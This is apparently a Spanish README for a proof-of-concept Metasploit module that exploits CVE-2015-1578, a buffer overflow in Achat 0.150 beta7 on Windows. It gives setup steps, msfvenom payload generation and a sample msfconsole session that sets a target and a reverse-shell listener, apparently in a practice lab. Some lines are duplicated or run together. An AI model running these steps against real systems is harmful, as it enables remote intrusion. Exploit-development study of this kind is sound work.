
Este es un exploit de módulo de Metasploit de prueba de concepto para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación conduce a la ejecución remota de código a través de un paquete UDP manipulado.
Este es un módulo de Metasploit para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación conduce a la ejecución remota de código a través de un paquete UDP manipulado.
Este módulo está diseñado para servir como un ejemplo limpio, mínimo y bien estructurado de desarrollo de exploits para Metasploit. Demuestra:
msfvenommsfvenom en tu $PATHmsfvenom para generar payload con codificación x86/unicode_mixed y caracteres no permitidos personalizados./install.sh
Luego inicia Metasploit y ejecuta:
reload_all
use exploit/windows/yaldobaoth/achat_bof
RHOSTS – Dirección IP del objetivo (requerido)LHOST – IP del host local para la shell inversa (requerido)LPORT – Puerto local para la shell inversa (por defecto: 4444)RPORT – Puerto UDP remoto en el objetivo (por defecto: 9256)msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
Esto hará lo siguiente:
LHOST:LPORT especificado